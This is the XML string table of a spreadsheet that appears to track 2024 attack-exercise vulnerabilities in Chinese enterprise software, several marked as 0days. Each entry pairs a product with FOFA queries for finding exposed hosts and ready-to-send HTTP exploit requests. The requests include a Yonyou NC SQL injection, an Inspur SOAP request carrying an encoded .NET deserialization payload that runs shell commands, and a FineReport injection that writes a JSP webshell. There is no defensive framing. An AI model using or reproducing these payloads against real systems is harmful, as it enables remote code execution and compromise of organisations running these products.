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491"/>
  </bookViews>
  <sheets>
    <sheet name="2024HW情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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="828" uniqueCount="542">
  <si>
    <t>时间</t>
  </si>
  <si>
    <t>漏洞名称（蓝色标记为0day）</t>
  </si>
  <si>
    <t>是否公开</t>
  </si>
  <si>
    <t>FOFA语法</t>
  </si>
  <si>
    <t>POC（黄色标记为已有POC）</t>
  </si>
  <si>
    <t>奇安信-天擎 前台任意命令执行</t>
  </si>
  <si>
    <t>未公开</t>
  </si>
  <si>
    <t>用友NC系统querygoodsgridbycode接口code参数存在SQL注入</t>
  </si>
  <si>
    <t>公开</t>
  </si>
  <si>
    <t>app.name=="用友 UAP"</t>
  </si>
  <si>
    <t>GET /ecp/productonsale/querygoodsgridbycode.json?code=1%27%29+AND+9976%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7C%28SELECT+%28CASE+WHEN+%289976%3D9976%29+THEN+1+ELSE+0+END%29+FROM+DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28118%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%29--+dpxi HTTP/1.1
Host: 
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Accept-Language: zh-CN,zh;q=0.9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Cache-Control: no-cache</t>
  </si>
  <si>
    <t>浪潮云财务系统存在命令执行（0day）</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>POST</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> /cwbase/gsp/webservice/bizintegrationwebservice/bizintegrationwebservice.asmx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16396</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http://tempuri.org/GetChildFormAndEntityList</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>"</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
cmd:</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> whoami</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&lt;GetChildFormAndEntityList</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&lt;baseFormID&gt;string&lt;/baseFormID&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
      &lt;baseEntityID&gt;string&lt;/baseEntityID&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
      &lt;strFormAssignment&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C4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAwAAAAZfaXRlbXMFX3NpemUIX3ZlcnNpb24FAAAICAkCAAAACgAAAAoAAAAQAgAAABAAAAAJAwAAAAkEAAAACQUAAAAJBgAAAAkHAAAACQgAAAAJCQAAAAkKAAAACQsAAAAJDAAAAA0GBwMAAAABAQAAAAEAAAAHAgkNAAAADA4AAABhU3lzdGVtLldvcmtmbG93LkNvbXBvbmVudE1vZGVsLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49MzFiZjM4NTZhZDM2NGUzNQUEAAAAalN5c3RlbS5Xb3JrZmxvdy5Db21wb25lbnRNb2RlbC5TZXJpYWxpemF0aW9uLkFjdGl2aXR5U3Vycm9nYXRlU2VsZWN0b3IrT2JqZWN0U3Vycm9nYXRlK09iamVjdFNlcmlhbGl6ZWRSZWYCAAAABHR5cGULbWVtYmVyRGF0YXMDBR9TeXN0ZW0uVW5pdHlTZXJpYWxpemF0aW9uSG9sZGVyDgAAAAkPAAAACRAAAAABBQAAAAQAAAAJEQAAAAkSAAAAAQYAAAAEAAAACRMAAAAJFAAAAAEHAAAABAAAAAkVAAAACRYAAAABCAAAAAQAAAAJFwAAAAkYAAAAAQkAAAAEAAAACRkAAAAJGgAAAAEKAAAABAAAAAkbAAAACRwAAAABCwAAAAQAAAAJHQAAAAkeAAAABAwAAAAcU3lzdGVtLkNvbGxlY3Rpb25zLkhhc2h0YWJsZQcAAAAKTG9hZEZhY3RvcgdWZXJzaW9uCENvbXBhcmVyEEhhc2hDb2RlUHJvdmlkZXIISGFzaFNpemUES2V5cwZWYWx1ZXMAAAMDAAUFCwgcU3lzdGVtLkNvbGxlY3Rpb25zLklDb21wYXJlciRTeXN0ZW0uQ29sbGVjdGlvbnMuSUhhc2hDb2RlUHJvdmlkZXII7FE4PwIAAAAKCgMAAAAJHwAAAAkgAAAADw0AAAAAEAAAAk1akAADAAAABAAAAP//AAC4AAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAAOH7oOALQJzSG4AUzNIVRoaXMgcHJvZ3JhbSBjYW5ub3QgYmUgcnVuIGluIERPUyBtb2RlLg0NCiQAAAAAAAAAUEUAAEwBAwBrydRkAAAAAAAAAADgAAIhCwELAAAIAAAABgAAAAAAAN4mAAAAIAAAAEAAAAAAABAAIAAAAAIAAAQAAAAAAAAABAAAAAAAAAAAgAAAAAIAAAAAAAADAECFAAAQAAAQAAAAABAAABAAAAAAAAAQAAAAAAAAAAAAAACQJgAASwAAAABAAACoAgAAAAAAAAAAAAAAAAAAAAAAAABgAAAMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAgAAAAAAAAAAAAAAAggAABIAAAAAAAAAAAAAAAudGV4dAAAAOQGAAAAIAAAAAgAAAACAAAAAAAAAAAAAAAAAAAgAABgLnJzcmMAAACoAgAAAEAAAAAEAAAACgAAAAAAAAAAAAAAAAAAQAAAQC5yZWxvYwAADAAAAABgAAAAAgAAAA4AAAAAAAAAAAAAAAAAAEAAAEIAAAAAAAAAAAAAAAAAAAAAwCYAAAAAAABIAAAAAgAFADAhAABgBQAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAbMAMAwwAAAAEAABECKAMAAAooBAAACgoGbwUAAApvBgAACgZvBwAACm8IAAAKcwkAAAoLB28KAAAKcgEAAHBvCwAACgZvDAAACm8NAAAKchEAAHBvDgAACgwHbwoAAApyGQAAcAgoDwAACm8QAAAKB28KAAAKF28RAAAKB28KAAAKF28SAAAKB28KAAAKFm8TAAAKB28UAAAKJgdvFQAACm8WAAAKDQZvBwAACglvFwAACt4DJt4ABm8HAAAKbxgAAAoGbwcAAApvGQAACioAARAAAAAAIgCHqQADDgAAAUJTSkIBAAEAAAAAAAwAAAB2NC4wLjMwMzE5AAAAAAUAbAAAALwBAAAjfgAAKAIAAHQCAAAjU3RyaW5ncwAAAACcBAAAJAAAACNVUwDABAAAEAAAACNHVUlEAAAA0AQAAJAAAAAjQmxvYgAAAAAAAAACAAABRxQCAAkAAAAA+iUzABYAAAEAAAAOAAAAAgAAAAEAAAAZAAAAAgAAAAEAAAABAAAAAwAAAAAACgABAAAAAAAGACkAIgAGAFYANgAGAHYANgAKAKgAnQAKAMAAnQAKAOgAnQAOABsBCAEOACMBCAEKAE8BnQAOAIYBZwEGAK8BIgAGACQCGgIGAEQCGgIGAGkCIgAAAAAAAQAAAAAAAQABAAAAEAAXAAAABQABAAEAUCAAAAAAhhgwAAoAAQARADAADgAZADAACgAJADAACgAhALQAHAAhANIAIQApAN0ACgAhAPUAJgAxAAIBCgA5ADAACgA5ADQBKwBBAEIBMAAhAFsBNQBJAJoBOgBRAKYBPwBZALYBRABBAL0BMABBAMsBSgBBAOYBSgBBAAACSgA5ABQCTwA5ADECUwBpAE8CWAAxAFkCMAAxAF8CCgAxAGUCCgAuAAsAZQAuABMAbgBcAASAAAAAAAAAAAAAAAAAAAAAAJQAAAAEAAAAAAAAAAAAAAABABkAAAAAAAQAAAAAAAAAAAAAABMAnQAAAAAABAAAAAAAAAAAAAAAAQAiAAAAAAAAAAA8TW9kdWxlPgBrd3V3YWNwdy5kbGwARQBtc2NvcmxpYgBTeXN0ZW0AT2JqZWN0AC5jdG9yAFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2VydmljZXMAQ29tcGlsYXRpb25SZWxheGF0aW9uc0F0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBrd3V3YWNwdwBTeXN0ZW0uV2ViAEh0dHBDb250ZXh0AGdldF9DdXJyZW50AEh0dHBTZXJ2ZXJVdGlsaXR5AGdldF9TZXJ2ZXIAQ2xlYXJFcnJvcgBIdHRwUmVzcG9uc2UAZ2V0X1Jlc3BvbnNlAENsZWFyAFN5c3RlbS5EaWFnbm9zdGljcwBQcm9jZXNzAFByb2Nlc3NTdGFydEluZm8AZ2V0X1N0YXJ0SW5mbwBzZXRfRmlsZU5hbWUASHR0cFJlcXVlc3QAZ2V0X1JlcXVlc3QAU3lzdGVtLkNvbGxlY3Rpb25zLlNwZWNpYWxpemVkAE5hbWVWYWx1ZUNvbGxlY3Rpb24AZ2V0X0hlYWRlcnMAZ2V0X0l0ZW0AU3RyaW5nAENvbmNhdABzZXRfQXJndW1lbnRzAHNldF9SZWRpcmVjdFN0YW5kYXJkT3V0cHV0AHNldF9SZWRpcmVjdFN0YW5kYXJkRXJyb3IAc2V0X1VzZVNoZWxsRXhlY3V0ZQBTdGFydABTeXN0ZW0uSU8AU3RyZWFtUmVhZGVyAGdldF9TdGFuZGFyZE91dHB1dABUZXh0UmVhZGVyAFJlYWRUb0VuZABXcml0ZQBGbHVzaABFbmQARXhjZXB0aW9uAAAAD2MAbQBkAC4AZQB4AGUAAAdjAG0AZAAABy8AYwAgAAAAAAA2IZXU/G1oT7AM+EyvNpdOAAi3elxWGTTgiQMgAAEEIAEBCAiwP19/EdUKOgQAABIRBCAAEhUEIAASGQQgABIhBCABAQ4EIAASJQQgABIpBCABDg4FAAIODg4EIAEBAgMgAAIEIAASMQMgAA4IBwQSERIdDg4IAQAIAAAAAAAeAQABAFQCFldyYXBOb25FeGNlcHRpb25UaHJvd3MBAAAAuCYAAAAAAAAAAAAAziYAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMAmAAAAAAAAAABfQ29yRGxsTWFpbgBtc2NvcmVlLmRsbAAAAAAA/yUAI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EAAAABgAAIAAAAAAAAAAAAAAAAAAAAEAAQAAADAAAIAAAAAAAAAAAAAAAAAAAAEAAAAAAEgAAABYQAAATAIAAAAAAAAAAAAATAI0AAAAVgBTAF8AVgBFAFIAUwBJAE8ATgBfAEkATgBGAE8AAAAAAL0E7/4AAAEAAAAAAAAAAAAAAAAAAAAAAD8AAAAAAAAABAAAAAIAAAAAAAAAAAAAAAAAAABEAAAAAQBWAGEAcgBGAGkAbABlAEkAbgBmAG8AAAAAACQABAAAAFQAcgBhAG4AcwBsAGEAdABpAG8AbgAAAAAAAACwBKwBAAABAFMAdAByAGkAbgBnAEYAaQBsAGUASQBuAGYAbwAAAIgBAAABADAAMAAwADAAMAA0AGIAMAAAACwAAgABAEYAaQBsAGUARABlAHMAYwByAGkAcAB0AGkAbwBuAAAAAAAgAAAAMAAIAAEARgBpAGwAZQBWAGUAcgBzAGkAbwBuAAAAAAAwAC4AMAAuADAALgAwAAAAPAANAAEASQBuAHQAZQByAG4AYQBsAE4AYQBtAGUAAABrAHcAdQB3AGEAYwBwAHcALgBkAGwAbAAAAAAAKAACAAEATABlAGcAYQBsAEMAbwBwAHkAcgBpAGcAaAB0AAAAIAAAAEQADQABAE8AcgBpAGcAaQBuAGEAbABGAGkAbABlAG4AYQBtAGUAAABrAHcAdQB3AGEAYwBwAHcALgBkAGwAbAAAAAAANAAIAAEAUAByAG8AZAB1AGMAdABWAGUAcgBzAGkAbwBuAAAAMAAuADAALgAwAC4AMAAAADgACAABAEEAcwBzAGUAbQBiAGwAeQAgAFYAZQByAHMAaQBvAG4AAAAwAC4AMAAuADAALg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wAAADgN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DwAAAB9TeXN0ZW0uVW5pdHlTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAREYXRhCVVuaXR5VHlwZQxBc3NlbWJseU5hbWUBAAEIBiEAAAD+AVN5c3RlbS5MaW5xLkVudW1lcmFibGUrV2hlcmVTZWxlY3RFbnVtZXJhYmxlSXRlcmF0b3JgMltbU3lzdGVtLkJ5dGVbXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHksIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAYiAAAATlN5c3RlbS5Db3JlLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4ORAQAAAABwAAAAkDAAAACgkkAAAACggIAAAAAAoICAEAAAABEQAAAA8AAAAGJQAAAPUCU3lzdGVtLkxpbnEuRW51bWVyYWJsZStXaGVyZVNlbGVjdEVudW1lcmFibGVJdGVyYXRvcm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QAAAAJIgAAABASAAAABwAAAAkEAAAACgkoAAAACggIAAAAAAoICAEAAAABEwAAAA8AAAAGKQAAAN8DU3lzdGVtLkxpbnEuRW51bWVyYWJsZStXaGVyZVNlbGVjdEVudW1lcmFibGVJdGVyYXRvcm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EAAAACSIAAAAQFAAAAAcAAAAJBQAAAAoJLAAAAAoICAAAAAAKCAgBAAAAARUAAAAPAAAABi0AAADmAlN5c3RlbS5MaW5xLkVudW1lcmFibGUrV2hlcmVTZWxlY3RFbnVtZXJhYmxlSXRlcmF0b3J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VHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAACSIAAAAQFgAAAAcAAAAJBgAAAAkwAAAACTEAAAAKCAgAAAAACggIAQAAAAEXAAAADwAAAAYyAAAA7wFTeXN0ZW0uTGlucS5FbnVtZXJhYmxlK1doZXJlU2VsZWN0RW51bWVyYWJsZUl0ZXJhdG9yYDJbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAJIgAAABAYAAAABwAAAAkHAAAACgk1AAAACggIAAAAAAoICAEAAAABGQAAAA8AAAAGNgAAAClTeXN0ZW0uV2ViLlVJLldlYkNvbnRyb2xzLlBhZ2VkRGF0YVNvdXJjZQQAAAAGNwAAAE1TeXN0ZW0uV2ViLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49YjAzZjVmN2YxMWQ1MGEzYRAaAAAABwAAAAkIAAAACAgAAAAACAgKAAAACAEACAEACAEACAgAAAAAARsAAAAPAAAABjkAAAApU3lzdGVtLkNvbXBvbmVudE1vZGVsLkRlc2lnbi5EZXNpZ25lclZlcmIEAAAABjoAAABJU3lzdGVtLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4ORAcAAAABQAAAA0CCTsAAAAICAMAAAAJCwAAAAEdAAAADwAAAAY9AAAANFN5c3RlbS5SdW50aW1lLlJlbW90aW5nLkNoYW5uZWxzLkFnZ3JlZ2F0ZURpY3Rpb25hcnkEAAAABj4AAABLbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5EB4AAAABAAAACQkAAAAQHwAAAAIAAAAJCgAAAAkKAAAAECAAAAACAAAABkEAAAAACUEAAAAEJAAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAgAAAAhEZWxlZ2F0ZQdtZXRob2QwAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyCUIAAAAJQwAAAAEoAAAAJAAAAAlEAAAACUUAAAABLAAAACQAAAAJRgAAAAlHAAAAATAAAAAkAAAACUgAAAAJSQAAAAExAAAAJAAAAAlKAAAACUsAAAABNQAAACQAAAAJTAAAAAlNAAAAATsAAAAEAAAACU4AAAAJTwAAAARCAAAAMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQcAAAAEdHlwZQhhc3NlbWJseQZ0YXJnZXQSdGFyZ2V0VHlwZUFzc2VtYmx5DnRhcmdldFR5cGVOYW1lCm1ldGhvZE5hbWUNZGVsZWdhdGVFbnRyeQEBAgEBAQMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BlAAAADVAVN5c3RlbS5GdW5jYDJbW1N5c3RlbS5CeXRlW10sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQk+AAAACgk+AAAABlIAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHkGUwAAAARMb2FkCgRDAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyBwAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlClNpZ25hdHVyZTIKTWVtYmVyVHlwZRBHZW5lcmljQXJndW1lbnRzAQEBAQEAAwgNU3lzdGVtLlR5cGVbXQlTAAAACT4AAAAJUgAAAAZWAAAAJ1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5IExvYWQoQnl0ZVtdKQZXAAAALlN5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5IExvYWQoU3lzdGVtLkJ5dGVbXSkIAAAACgFEAAAAQgAAAAZYAAAAzAJTeXN0ZW0uRnVuY2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k+AAAACgk+AAAACVIAAAAGWwAAAAhHZXRUeXBlcwoBRQAAAEMAAAAJWwAAAAk+AAAACVIAAAAGXgAAABhTeXN0ZW0uVHlwZVtdIEdldFR5cGVzKCkGXwAAABhTeXN0ZW0uVHlwZVtdIEdldFR5cGVzKCkIAAAACgFGAAAAQgAAAAZgAAAAtgNTeXN0ZW0uRnVuY2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JPgAAAAoJPgAAAAZiAAAAhAFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYWJsZWAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0GYwAAAA1HZXRFbnVtZXJhdG9yCgFHAAAAQwAAAAljAAAACT4AAAAJYgAAAAZmAAAARVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbU3lzdGVtLlR5cGVdIEdldEVudW1lcmF0b3IoKQZnAAAAlAFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYXRvcmAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0gR2V0RW51bWVyYXRvcigpCAAAAAoBSAAAAEIAAAAGaAAAAMACU3lzdGVtLkZ1bmN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Qm9vbGVhbiwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JPgAAAAoJPgAAAAZqAAAAHlN5c3RlbS5Db2xsZWN0aW9ucy5JRW51bWVyYXRvcgZrAAAACE1vdmVOZXh0CgFJAAAAQwAAAAlrAAAACT4AAAAJagAAAAZuAAAAEkJvb2xlYW4gTW92ZU5leHQoKQZvAAAAGVN5c3RlbS5Cb29sZWFuIE1vdmVOZXh0KCkIAAAACgFKAAAAQgAAAAZwAAAAvQJTeXN0ZW0uRnVuY2AyW1tTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYXRvcmAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQk+AAAACgk+AAAABnIAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQZzAAAAC2dldF9DdXJyZW50CgFLAAAAQwAAAAlzAAAACT4AAAAJcgAAAAZ2AAAAGVN5c3RlbS5UeXBlIGdldF9DdXJyZW50KCkGdwAAABlTeXN0ZW0uVHlwZSBnZXRfQ3VycmVudCgpCAAAAAoBTAAAAEIAAAAGeAAAAMYBU3lzdGVtLkZ1bmNgMltbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCT4AAAAKCT4AAAAGegAAABBTeXN0ZW0uQWN0aXZhdG9yBnsAAAAOQ3JlYXRlSW5zdGFuY2UKAU0AAABDAAAACXsAAAAJPgAAAAl6AAAABn4AAAApU3lzdGVtLk9iamVjdCBDcmVhdGVJbnN0YW5jZShTeXN0ZW0uVHlwZSkGfwAAAClTeXN0ZW0uT2JqZWN0IENyZWF0ZUluc3RhbmNlKFN5c3RlbS5UeXBlKQgAAAAKAU4AAAAPAAAABoAAAAAmU3lzdGVtLkNvbXBvbmVudE1vZGVsLkRlc2lnbi5Db21tYW5kSUQEAAAACToAAAAQTwAAAAIAAAAJggAAAAgIACAAAASCAAAAC1N5c3RlbS5HdWlkCwAAAAJfYQJfYgJfYwJfZAJfZQJfZgJfZwJfaAJfaQJfagJfawAAAAAAAAAAAAAACAcHAgICAgICAgITE9J07irREYv7AKDJDyb3Cws=&lt;/strFormAssignment&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
      &lt;isBase&gt;0&lt;/isBase&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
    &lt;/GetChildFormAndEntityList&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
  &lt;/soap:Body&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
&lt;/soap:Envelope&gt;</t>
    </r>
  </si>
  <si>
    <t>帆软FineReport ReportSever Sqlite注入导致远程代码执行漏洞（0day）</t>
  </si>
  <si>
    <t>app="帆软-FineReport"</t>
  </si>
  <si>
    <t>GET /webroot/decision/view/ReportServer?test=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amp;n=${__fr_locale__=sql('FRDemo',DECODE('%ef%bb%bf%61%74%74%61%63%68%0C%64%61%74%61%62%61%73%65%20%27%2F%68%6F%6D%65%2F%46%44%4C%2F%74%6F%6D%63%61%74%2D%6C%69%6E%75%78%2F%77%65%62%61%70%70%73%2F%77%65%62%72%6F%6F%74%2F%68%65%6C%70%2F%74%31%36%32%36%35%39%34%2E%6A%73%70%27%20%61%73%20%27%74%31%36%32%36%35%39%34%27%3B'),1,1)}${__fr_locale__=sql('FRDemo',DECODE('%ef%bb%bf%63%72%65%61%74%65%0C%74%61%62%6C%65%20%74%31%36%32%36%35%39%34%2E%74%74%28%64%61%74%61%7A%20%74%65%78%74%29%3B'),1,1)}${__fr_locale__=sql('FRDemo',DECODE('%ef%bb%bf%49%4E%53%45%52%54%0C%69%6E%74%6F%20%74%31%36%32%36%35%39%34%2E%74%74%28%64%61%74%61%7A%29%20%56%41%4C%55%45%53%20%28%27%3C%25%43%6C%61%73%73%20%73%61%66%65%20%3D%20%43%6C%61%73%73%2E%66%6F%72%4E%61%6D%65%28%22%73%75%6E%2E%6D%69%73%63%2E%55%6E%73%61%66%65%22%29%3B%6A%61%76%61%2E%6C%61%6E%67%2E%72%65%66%6C%65%63%74%2E%46%69%65%6C%64%20%73%61%66%65%43%6F%6E%20%3D%20%73%61%66%65%2E%67%65%74%44%65%63%6C%61%72%65%64%46%69%65%6C%64%28%22%74%68%65%55%6E%22%20%2B%20%22%73%61%66%65%22%29%3B%73%61%66%65%43%6F%6E%2E%73%65%74%41%63%63%65%73%73%69%62%6C%65%28%74%72%75%65%29%3B%73%75%6E%2E%6D%69%73%63%2E%55%6E%73%61%66%65%20%75%6E%53%61%66%65%20%3D%20%28%73%75%6E%2E%6D%69%73%63%2E%55%6E%73%61%66%65%29%20%73%61%66%65%43%6F%6E%2E%67%65%74%28%6E%75%6C%6C%29%3B%62%79%74%65%5B%5D%20%64%61%74%61%42%79%74%65%73%20%3D%20%6A%61%76%61%78%2E%78%6D%6C%2E%62%69%6E%64%2E%44%61%74%61%74%79%70%65%43%6F%6E%76%65%72%74%65%72%2E%70%61%72%73%65%42%61%73%65%36%34%42%69%6E%61%72%79%28%72%65%71%75%65%73%74%2E%67%65%74%50%61%72%61%6D%65%74%65%72%28%22%64%61%74%61%22%29%29%3B%75%6E%53%61%66%65%2E%64%65%66%69%6E%65%41%6E%6F%6E%79%6D%6F%75%73%43%6C%61%73%73%28%6A%61%76%61%2E%69%6F%2E%46%69%6C%65%2E%63%6C%61%73%73%2C%20%64%61%74%61%42%79%74%65%73%2C%20%6E%75%6C%6C%29%2E%6E%65%77%49%6E%73%74%61%6E%63%65%28%29%3B%25%3E%27%29%3B'),1,1)} HTTP/1.1
host: xxxx
connection: close
content-type: application/x-www-form-urlencoded
x-forwarded-for: xxxx
accept-encoding: gzip, deflate
user-agent: python-requests/2.31.0
accept: */*</t>
  </si>
  <si>
    <t>通天星主动安全监控云平台远程代码执行漏洞(0day)</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>H3C Workspace 云桌面 远程命令执行漏洞(0day</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>)</t>
    </r>
  </si>
  <si>
    <t>"H3C Workspace"</t>
  </si>
  <si>
